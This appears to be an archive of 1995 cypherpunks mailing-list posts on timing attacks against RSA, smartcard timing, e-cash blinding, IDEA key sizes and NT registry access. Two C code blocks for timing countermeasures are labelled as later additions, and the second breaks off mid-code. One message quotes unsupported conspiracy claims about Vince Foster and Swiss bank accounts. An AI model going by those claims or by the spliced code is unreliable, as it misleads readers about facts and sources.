From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Thu, 14 Dec 1995 17:40:38 +0800
To: "Perry E. Metzger" <cypherpunks@toad.com
Subject: Re: Jim Quinn interview of James Norman (edited)
Message-ID: <199512130722.BAA23513@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            ecarp@netcom.com
> Cc:            cypherpunks@toad.com
> Subject:       Re: Jim Quinn interview of James Norman (edited) 
> Reply-to:      perry@piermont.com
> Date:          Tue, 12 Dec 1995 14:53:14 -0500
> From:          "Perry E. Metzger" <perry@piermont.com>

> 
> According to the headers, you, Mr. Carp, forwarded this to
> Cypherpunks, when it was obviously available to those that wanted to
> read it on a variety of other mailing lists.
> 
> Please don't continue doing this.
> 
> Jon Roland writes:
> > The following is a Radio Interview between James Norman, 
> > formerly Senior Editor of Forbes Magazine and now with Media 
> > Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
> > In this interview from December 7th, they discuss issues of 
> > national importance and STUNNING IMPACT. Essentially they give 
> > out the reason for Vincent Foster's Death, and the fact that 
> > the "resignations" of the Congresspersons are NOT for policy 
> > reasons but because they have been caught with millions in 
> > corrupt funds in Swiss Banks. Read this to learn what the 
> > "mainstream media" doesn't ever tell you... 

Unfortunately, even I sometimes hit the wrong button on my mailer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Wed, 13 Dec 1995 15:05:57 +0800
To: "Ed Carp (ecarp@netcom.com>
Subject: Re: EXON
In-Reply-To: <199512122017.OAA20584@khijol>
Message-ID: <Pine.BSF.3.91.951212235421.4704A-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Ed Carp (ecarp@netcom.com) wrote:

> > From:          Rich Graves <llurch@networking.stanford.edu>
> >
> > (There is some controversy in molecular biology circles as to whether 
> > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > could perform a regulatory or "frame-check" function.)
> 
> Actually, I think that once the matter is further studied, scientists 
> will discover that the "junk DNA" is not junk, but inactive DNA, 
> waiting for a "trigger".

Well, there are a couple of interesting things:

	o mutations in non-coding sequences are known to cause certain
	  flavors of cancer, and

	o the amount of redundancy in exons is rather high in comparison
	  to the coding sequences (much like other Exons we know :),
	  approaching that of other naturally arising degradation-resistant
	  signals, such as human language. 

So the signs as of right now are definitely pointing to exons having some 
purpose.  The problem is that exons usually lay outside the start and 
stop sequences, so nobody knows how they are read, which makes it hard to 
give them an interpretation.

Marc.

ObCrypto: Store your private key in your non-coding DNA?  If we all did
that would the Red Cross become the national voluntary key escrow agent? 
Would that actually be good because then they would mislabel all the keys
and destroy half of the lot in the process of collection? If cancerous 
cells had PGP keys, would the immune system destroy them or just detain 
them for a really long time until they withered away of malnutrition and 
stress?  Should I go to bed?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 13 Dec 1995 16:46:41 +0800
To: mrami@minerva.cis.yale.edu
Subject: Re: EXON
In-Reply-To: <Pine.BSF.3.91.951212235421.4704A-100000@mramirez.sy.yale.edu>
Message-ID: <Pine.LNX.3.91.951213001004.2163B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, Marc Ramirez wrote:

> Date: Wed, 13 Dec 1995 00:21:32 -0500 (EST)
> From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
> To: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
> Cc: Rich Graves <llurch@networking.stanford.edu>,
>     High Society List <cypherpunks@toad.com>
> Subject: Re: EXON
> 
> On Tue, 12 Dec 1995, Ed Carp (ecarp@netcom.com) wrote:
> 
> > > From:          Rich Graves <llurch@networking.stanford.edu>
> > >
> > > (There is some controversy in molecular biology circles as to whether 
> > > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > > could perform a regulatory or "frame-check" function.)
> > 
> > Actually, I think that once the matter is further studied, scientists 
> > will discover that the "junk DNA" is not junk, but inactive DNA, 
> > waiting for a "trigger".
> 
> Well, there are a couple of interesting things:
> 
> 	o mutations in non-coding sequences are known to cause certain
> 	  flavors of cancer, and
> 
> 	o the amount of redundancy in exons is rather high in comparison
> 	  to the coding sequences (much like other Exons we know :),
> 	  approaching that of other naturally arising degradation-resistant
> 	  signals, such as human language. 
> 
> So the signs as of right now are definitely pointing to exons having some 
> purpose.  The problem is that exons usually lay outside the start and 
> stop sequences, so nobody knows how they are read, which makes it hard to 
> give them an interpretation.


folks, say yes to proof reading.

sorry to perpetuate this thread any more but as one of the resident
biochemists/mol biologists i've got an itch to scratch.

in the lines with the single '>' above, you need to replace the word
'exon' with 'intron'.


    exons --> DNA sequences in a gene that (can) yield protein after splicing

    introns --> DNA sequences that are interspersed between exons in a gene


introns have several known roles, including roles in RNA splicing and
RNA editing (a process that sort of skirts the central dogma of 
DNA -> RNA -> protein by changing the 'code' in the RNA).

non-coding sequences represent the bulk of DNA, and for the most part
it's role is unknown although various people have their pet theories.
gene regulation is often carried out by non-coding sequences,
including sequences that are never transcribed into RNA.  thus, they
can be involved in any cancer process.



patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM6AeE3Qo/lG0AH5AQEwrAQAiVWuSI1nP8AzT6IEQU9yucb/VCkU4V4K
h3LUhnlfBrDsUujI2FbS3jPIh9apVcQ7dy4Di0xYTxUalZ82l6MJqfh+an7S09df
N6SpdgiRweefw2VQQcA5GbMPfaZFdmm5yRbDbuBF9HYlnpY8g63DmDDft7xGg4s8
koeh8v2/KTs=
=uX7u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 15 Dec 1995 07:50:45 +0800
To: Tod McQuillin <devin@lm.com>
Subject: Re: PGP/PINE integration
In-Reply-To: <Pine.VUL.3.91.951212215232.25435I-100000@throop.foxholly.com>
Message-ID: <Pine.ULT.3.91.951213014345.22977C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For those that don't need quite this much or don't have access to pine at 
the install level (often for university systems with a central software 
depository), I have a script called PineSign available on my home page 
(or email me) that will allow simple PGP signing of your pine mailings 
and postings.  It doesn't do encryption, but works great for signatures.
For encryption, I usually do that within filespace anyways where I have 
a little more control over things.

Of course, as with all things UNIX, you use what you find most useful.  
That's why there are 101 ways to do anything. :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMM5oxDokqlyVGmCFAQEayAP/V/u020yrCLoM3WhzCYSMYb8pOuh7HOtT
Hnkv5HABS5vwqB9Rv6pl2Z25H9Sfv7js+pOHg+b32A25STW1TbrT15KZ3EegTz86
cErave0aaQpy9ZbO1X409hA10AJHwXFBvGpFSuSH/RPNSPg/raW+oPa8VCmi4gr+
/yk/FH33lfk=
=Rywu
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Thu, 14 Dec 1995 17:42:51 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
In-Reply-To: <199512130237.VAA21019@charon.MIT.EDU>
Message-ID: <Pine.A32.3.91.951213015449.59778A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Dec 1995, Derek Atkins wrote:

> > The copy of the source for idea (unix) that I have specifies a user key 
> > length of 8 bytes, but allows this to be increased to something larger. 
> > Will increasing the user keylength improve the overall security? 
> 
> Umm, I think you are confused.  First, IDEA has a keysize of 16 bytes,
> not 8.  Second, it cannot be easily changed.  Sure, your code probably

/******************************************************************************/
/*                                                                            */
/* I N T E R N A T I O N A L  D A T A  E N C R Y P T I O N  A L G O R I T H M */
/*                                                                            */
/******************************************************************************/
/* Author:       Richard De Moliner (demoliner@isi.ee.ethz.ch)                */
/*               Signal and Information Processing Laboratory                 */
/*               Swiss Federal Institute of Technology                        */
/*               CH-8092 Zuerich, Switzerland                                 */
/* Created:      April 23, 1992                                               */
/* Changes:      November 16, 1993 (support of ANSI-C and C++)                */
/* System:       SUN SPARCstation, SUN acc ANSI-C-Compiler, SUN-OS 4.1.3      */
/******************************************************************************/
/* Change this type definitions to the representations in your computer.      */

[snipped irrelevant bits]

/******************************************************************************/
/* It is possible to change this values.                                      */

#define Idea_nofRound                 8 /* number of rounds                   */
#define Idea_userKeyLen               8 /* user key length (8 or larger)      */

/******************************************************************************/
/* Do not change the lines below.                                             */

#define Idea_dataLen                       4 /* plain-/ciphertext block length*/
#define Idea_keyLen    (Idea_nofRound * 6 + 4) /* en-/decryption key length   */

#define Idea_dataSize       (Idea_dataLen * 2) /* 8 bytes = 64 bits           */
#define Idea_userKeySize (Idea_userKeyLen * 2) /* 16 bytes = 128 bits         */

[end cut out]

So what I'm reading here is: A) it is possible to change the value of the 
userkeylength, and B) the actual key is (2 * userkeylen) or in the case 
of an 8byte key, 2 * 8bytes = 16 bytes = 128bits.

Maybe I'm crazy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 15 Dec 1995 18:56:29 +0800
To: cypherpunks@toad.com
Subject: simple Unix CPU time quantization functions available
Message-ID: <199512130702.CAA24131@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've made available a simple CPU time quantization package that
provides a simple interface to encapsulate code blocks that must
run in a multiple of a coarse-grained "quantized" amount of CPU
time.  It is useful in building various on-line cryptographic
protocols in which an attacker could otherwise learn key information
by observing the time the target takes to perform calculations that
use the secret (cf. Paul Kocher's recent attacks).

The basic idea is that you can specify a "quantum" such that at the
end of an encapsulated block the CPU will busy-wait until the next
quantum multiple.  Fine-grained (below the quantum) timing information
is thereby denied to the observer (including unprivileged processes on
the same machine).  The code is quick-and-dirty and only runs on
Unix-centric platforms.  Test and use at your own risk.

There are (basically) no restrictions on the use or distribution
of the (very simple) code.

Get it from:
	ftp://research.att.com/dist/mab/quantize.shar

The quantize package is also part of Jack Lacy's cryptolib package (watch
this space for details).

-matt
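
The quantization idea described in the message above, as an added example that is not part of the original post and is not the code in quantize.shar. The names `quant_begin`, `quant_end` and `quantized_modexp`, the use of ISO C `clock()` as the CPU-time source, and the toy modulus are assumptions made for this sketch.

```c
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Hypothetical names throughout; this is not the interface of quantize.shar. */
typedef struct {
    clock_t start;    /* process CPU time when the protected block began */
    clock_t quantum;  /* quantum length in clock() ticks */
} quant_ctx;

/* Mark the start of a block whose CPU time must be rounded up. */
static void quant_begin(quant_ctx *q, unsigned quantum_ms)
{
    q->quantum = (clock_t)((double)quantum_ms * CLOCKS_PER_SEC / 1000.0);
    if (q->quantum < 1)
        q->quantum = 1;
    q->start = clock();
}

/* Busy-wait until the CPU time consumed since quant_begin() reaches the next
 * quantum multiple.  Spinning instead of sleeping means the padding is also
 * charged as CPU time, so process accounting shows whole quanta only.
 * Returns the number of quanta charged. */
static long quant_end(const quant_ctx *q)
{
    clock_t used = clock() - q->start;
    long quanta = (long)(used / q->quantum) + 1;
    clock_t deadline = q->start + (clock_t)quanta * q->quantum;
    while (clock() < deadline)
        ;
    return quanta;
}

/* Square-and-multiply with a data-dependent multiply: the running time
 * depends on the bits of exp, which is the leak being hidden.
 * Requires mod < 2^32 so the products fit in 64 bits. */
static uint64_t modexp_leaky(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t r = 1 % mod;
    base %= mod;
    while (exp) {
        if (exp & 1)
            r = r * base % mod;      /* only executed for 1 bits */
        base = base * base % mod;
        exp >>= 1;
    }
    return r;
}

/* Run the leaky operation inside a quantized block.  Reports how many quanta
 * were charged and the CPU time an observer would measure, in milliseconds. */
static uint64_t quantized_modexp(uint64_t base, uint64_t exp, uint64_t mod,
                                 unsigned quantum_ms, long *quanta,
                                 double *cpu_ms)
{
    quant_ctx q;
    clock_t t0 = clock();
    quant_begin(&q, quantum_ms);
    uint64_t r = modexp_leaky(base, exp, mod);
    *quanta = quant_end(&q);
    *cpu_ms = (double)(clock() - t0) * 1000.0 / CLOCKS_PER_SEC;
    return r;
}

int main(void)
{
    const uint64_t mod = 4294967291ull;           /* constructed toy modulus */
    const uint64_t exps[2] = { 0x1ull, 0xFFFFFFFFFFFFFFFFull };
    for (int i = 0; i < 2; i++) {
        long quanta;
        double ms;
        uint64_t r = quantized_modexp(7, exps[i], mod, 50, &quanta, &ms);
        printf("exp=%016llx result=%llu quanta=%ld cpu=%.3f ms\n",
               (unsigned long long)exps[i], (unsigned long long)r, quanta, ms);
    }
    return 0;
}
```

Both exponents are charged one 50 ms quantum even though the second performs 63 more multiplications than the first; an operation that overruns a quantum is rounded up to the next one, so the quantum has to be chosen larger than the slowest expected run for the padding to hide anything.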




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Wed, 13 Dec 1995 16:51:36 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: EXON
In-Reply-To: <Pine.LNX.3.91.951213001004.2163B-100000@zifi.genetics.utah.edu>
Message-ID: <Pine.BSF.3.91.951213031835.5991A-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Dec 1995, zinc wrote:

> sorry to perpetuate this thread any more but as one of the resident
> biochemists/mol biologists i've got an itch to scratch.
> 
> in the lines with the single '>' above, you need to replace the word
> 'exon' with 'intron'.

Oops.  Brain fart.

Sorry.

Marc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Armadillo Remailer <remailer@armadillo.com>
Date: Wed, 13 Dec 1995 22:37:51 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131315.HAA01726@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> writes:

>My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>attack is that it could be a problem for smartcards (almost certainly)

Is it a problem to create smartcards that do their calculations in
fixed time? I'd guess it should be easier than on multi-purpose
hardware.

Does the attack work for existing smartcards?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 13 Dec 1995 21:59:24 +0800
To: jamesd@echeque.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512130722.XAA11947@blob.best.net>
Message-ID: <cknh5WaMc50e02iplN@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 12-Dec-95 Re: Usability of Cryptograp.. "James
A. Donald"@echequ (1242*)

> If we stick to a lesser goal -- constancy of identity -- 
> this is not so hard.  In general it is impossible to prove that 
> Bryce is the "real" Bryce, but it is trivial to prove that 
> Bryce is the same Bryce who has a certain Web page, and the
> same Bryce who posted a certain article in archives.

Agreed completely, if you add:

"....unless the person claiming to be Bryce is someone who managed to
steal secret keys from that same Bryce."

Without this clause, it seems to me you're assuming that secret keys (or
other identity-verifying tokens) can't ever be stolen.  Insofar as you
use multiple things (cryptography, IP address, etc.) to identify
someone, you can make it harder to impersonate someone, but each of
these things is ultimately forge-able.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 13 Dec 1995 22:33:48 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120056.QAA16055@mage.qualcomm.com>
Message-ID: <IAA03848.199512131330@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199512120056.QAA16055@mage.qualcomm.com>, Peter Monta writes:
>> Of course, this works against a remote adversary, but not against one
>> on the same machine who can look at actual CPU consumption (which doesn't
>> increase when the target is blocked).
>
>Maybe this is a good reason to spinwait, rather than sleep, until
>the timer expires.  It would be pretty subtle to distinguish that
>from "real" computation.

Across a net it should be hard.  On the same CPU it may be easy.  Some
CPUs with hardware branch prediction keep track of how many branches were
correctly and incorrectly predicted.  These registers are not always
protected, and not always "made virtual" by the OS.

If your spin wait is of the form:

LOAD #big_number, R1
L1:
DEC R1
BNE L1

(a.k.a "for(i = big_number; i--;) { }")

Then the "number of correctly predicted branches" will go up by approximately
big_number...

(in all honesty the only CPU I am sure "allows" normal user programs to
see the performance registers is the AMD29xxx series, and that is only
if the OS sets the right bit in the register protection mask.  I know
the P6 has such performance registers, but don't know if they are protected,
and I think the P5 has them, but again I don't know if they are protected.
I think some of the Alphas have them, but seem to remember them being
protected (and I used to think it was a dumb idea...))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 23:03:10 +0800
To: remailer@armadillo.com (Armadillo Remailer)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512131315.HAA01726@monad.armadillo.com>
Message-ID: <199512131439.JAA10842@homeport.org>
MIME-Version: 1.0
Content-Type: text


Armadillo Remailer wrote:

| >My gut & scribble-on-the-back-of-a-napkin feeling about this class of
| >attack is that it could be a problem for smartcards (almost certainly)
| 
| Is it a problem to create smartcards that do their calculations in
| fixed time? I'd guess it should be easier than on multi-purpose
| hardware.

	Not if the fixed time is in weeks.

	If you read the Crypto proceedings, you'll find a number of
papers on using an (untrusted) CPU, such as that in a cash machine, to
aid a smartcard.  This is because the CPUs in smartcards are very
slow.

	Maximchuck, at Bell Labs, has a protocol for Anonymous Credit
Cards which uses pre-chosen private keys between correspondents and a
set of remailers to anonymize credit card transactions with respect
to a merchant. (The bank still knows who's buying how much, and I
think where.)  Anyway, he freely admits that the reason for private
key work is their cards couldn't handle the public key operations.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 14 Dec 1995 19:49:21 +0800
To: cypherpunks@toad.com
Subject: Re: NT Password Security Update.  Registry values changed!
In-Reply-To: <2.2b7.32.19951213071131.00316644@netcom14.netcom.com>
Message-ID: <30CE9F76.23C7@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ted Cabeen wrote:
 
> Well, I did some more research into the NT password security issue and I
> discovered that I can get access to the Security section of the registry

How did you do that?  The SECURITY section is always greyed out and the
operating system will not allow you to change the permissions on it.

If you did indeed gain access to that area then you've probably found a
flaw in the tamperproof capabilities of NT.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 23:39:13 +0800
To: schunter@informatik.uni-hildesheim.de (Matthias Schunter)
Subject: Re: e-Cash: CAFE vs. Mondex
In-Reply-To: <v02120d09acf307537019@[147.172.54.29]>
Message-ID: <199512131446.JAA10908@homeport.org>
MIME-Version: 1.0
Content-Type: text


Matthias Schunter wrote:

| The CAFE system is a cheque based system. This means that the
| customer receives an electronic chequebook, where each cheque is
| (blindly) signed by the bank.  
| During each payment the customer has to use one of these signed cheques.

|  privacy-protecting
|    The privacy of the user is protected.

	How do checks protect the privacy of the user?  The bank
knows who is spending how much with whom for each check.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 23:52:08 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <Pine.SUN.3.91.951212231006.5039C-100000@tipper.oit.unc.edu>
Message-ID: <199512131500.KAA01853@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Perry - I don't think NTP goes down to the sort of resolution that 
> appeared to be where the signal is here, and for quantisation reasons, I 
> don't think it can work over a public routed internetwork.

The question isn't whether you can really get the timing down as far
as you want, but whether you can use statistics to cut down your
search space sufficiently to make things interesting. I can't say, but
I'm no longer prepared to trust the stuff, being fairly conservative
in what I trust.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 14 Dec 1995 03:42:43 +0800
To: "Josh M. Osborne" <pmonta@qualcomm.com>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131812.KAA25397@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:30 12/13/95 -0500, Josh M. Osborne wrote:
>In message <199512120056.QAA16055@mage.qualcomm.com>, Peter Monta writes:
>>> Of course, this works against a remote adversary, but not against one
>>> on the same machine who can look at actual CPU consumption (which doesn't
>>> increase when the target is blocked).
>>
>>Maybe this is a good reason to spinwait, rather than sleep, until
>>the timer expires.  It would be pretty subtle to distinguish that
>>from "real" computation.
>
>Across a net it should be hard.  On the same CPU it may be easy.  Some
>CPUs with hardware branch prediction keep track of how many branches were
>correctly and incorrectly predicted.  These registers are not always
>protected, and not always "made virtual" by the OS.

Of course you can spend the time doing exponentiation of random
(pseudorandom would probably do) numbers, and when the timer pops, longjump
out to return your answer.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Thu, 14 Dec 1995 03:13:34 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512131624.KAA20591@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 AM 12/13/95 -0500, you wrote:
>Armadillo Remailer wrote:
>
>| >My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>| >attack is that it could be a problem for smartcards (almost certainly)
>| 
>| Is it a problem to create smartcards that do their calculations in
>| fixed time? I'd guess it should be easier than on multi-purpose
>| hardware.
>
>	Not if the fixed time is in weeks.
>
>	If you read the Crypto proceedings, you'll find a number of
>papers on using an (untrusted) CPU, such as that in a cash machine, to
>aid a smartcard.  This is because the CPUs in smartcards are very
>slow.

DigiCash has been aware of the timing problem for years. Especially as it
relates to smartcards, for which you can get timings down to the clock
cycle. Consequently, both DigiCash's smartcards and DigiCash's Ecash use
fixed timings.

--Lucky at work

--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 14 Dec 1995 00:42:45 +0800
To: cypherpunks@toad.com
Subject: Re: NT Password Security Update.  Registry values changed!
Message-ID: <9512131601.AA04595@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Ted Cabeen wrote:
>  
> > Well, I did some more research into the NT password security issue and I
> > discovered that I can get access to the Security section of the registry 

> How did you do that?  The SECURITY section is always greyed out and the
> operating system will not allow you to change the permissions on it.

> If you did indeed gain access to that area then you've probably found a
> flaw in the tamperproof capabilities of NT.
> - Andy

Andy, do you have Administrator privs on your NT system? I too seem
to have full access to all registry entries, including all under Security.

M$ may have some hidden areas in the registry (security by obscurity),
but I can't see anything that says 'sorry, you can't look here'.

Speaking for myself.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 14 Dec 1995 06:41:35 +0800
To: cypherpunks@toad.com
Subject: Re: Spotty c'punks service due to network outages
Message-ID: <2.2b7.32.19951213200827.008e63dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:35 PM 12/12/95 -0800, you wrote:
>Our network service is going up and down, probably due to the storms
>in San Francisco.  If you see delays, that's the reason why.  As far
>as I know, NSA has not figured out how to control the weather, so it's
>not their fault :-).

This is not just in San Francisco...  Portland, OR has been having some
pretty bad problems with power outages.  (My ISP was offline all last
night.)  I expect that Seattle will be having similar problems due to the
storm front that just went through.

As for the NSA controlling the Weather Organization...  That only counts as
a successful attack if they have the Evil Geniuses for a Better Tomorrow
assisting in the attack.  (And they are controlled by at least one computer
group.)  Sorry...  Been catching up on my mail from the Illuminati mailing list.
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Wed, 13 Dec 1995 10:57:27 +0800
To: cypherpunks@toad.com
Subject: Timing RSA and Certificates worth ??
Message-ID: <m0tPgKo-0006MlC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


oops
Earlier, I said :
>
>My limited mind induces me to think that a certificate becomes subject to
>timing attacks on the RSA private signing key.
>In this case, certificate verification  processes seem flawed and highly
>unreliable.

I meant that on-line certificate issuing, notary and similar services where
data is submitted to a system for processing/RSA encryption are subject to
this form of attack.
Parts of the SEPP/STT protocols appear to require this of merchants and
customers.
I retract my comments about ecash/echeques - I'm not sure of the
implications there yet.
As for SEPP/STT - another nail in the coffin, methinks.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 14 Dec 1995 08:16:31 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Blinding against Kocher's timing attacks
Message-ID: <m0tPynk-0008yYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 PM 12/12/95 -0800, you wrote:
>From: ljo@ausys.se (Johansson Lars)
>> Does anyone know whether David Chaum's patent on
>> blind digital signatures extends to this application?
>
>I don't think it would.  Chaum's blinding protocol has one major
>difference: the blinding factor is applied by a different person than
>the one doing the signing.  The purpose of the blinding is different,
>too; in Chaum's case the idea is to end up with a signature which is
>unknown to the signer, while with Kocher's "defensive blinding" the
>signature (or decryption) is an ordinary RSA one, and the blinding is
>just done internally by the signer to randomize the timing.

One thing I haven't heard mentioned would be the possibility of using TWO
blinding factors, by two different people, to blind the unsigned cash.    As
you may know, I'm interested in payee-anonymous systems as well as
payer-anonymous ones, and such a feature might assist in this.
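
The distinction drawn in the quoted text above, between Chaum's blind signature and the signer-internal "defensive blinding", shown as an added example that is not part of the original message. The key is a constructed textbook-size RSA key, the function names are hypothetical, and the blinding factor `r` is passed in as a parameter for reproducibility where a real signer or requester would draw it from a cryptographic random source.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed toy key: n = 61 * 53, e * d = 1 mod 3120.  Illustration only. */
static const uint64_t RSA_N = 3233, RSA_E = 17, RSA_D = 2753;

static uint64_t modpow(uint64_t b, uint64_t e, uint64_t n)
{
    uint64_t r = 1 % n;
    b %= n;
    while (e) {
        if (e & 1)
            r = r * b % n;
        b = b * b % n;
        e >>= 1;
    }
    return r;
}

/* Modular inverse by extended Euclid; returns 0 when gcd(a, n) != 1. */
static uint64_t modinv(uint64_t a, uint64_t n)
{
    int64_t t = 0, newt = 1;
    int64_t r = (int64_t)n, newr = (int64_t)(a % n);
    while (newr != 0) {
        int64_t q = r / newr, tmp;
        tmp = t - q * newt; t = newt; newt = tmp;
        tmp = r - q * newr; r = newr; newr = tmp;
    }
    if (r != 1)
        return 0;
    return (uint64_t)(t < 0 ? t + (int64_t)n : t);
}

/* The raw private-key operation whose running time depends on its input. */
static uint64_t rsa_private(uint64_t x)
{
    return modpow(x, RSA_D, RSA_N);
}

/* Shared arithmetic: blind with r^e, unblind with r^-1. */
static uint64_t blind(uint64_t m, uint64_t r)
{
    return (m % RSA_N) * modpow(r, RSA_E, RSA_N) % RSA_N;
}

static uint64_t unblind(uint64_t s_blinded, uint64_t r_inv)
{
    return s_blinded * r_inv % RSA_N;
}

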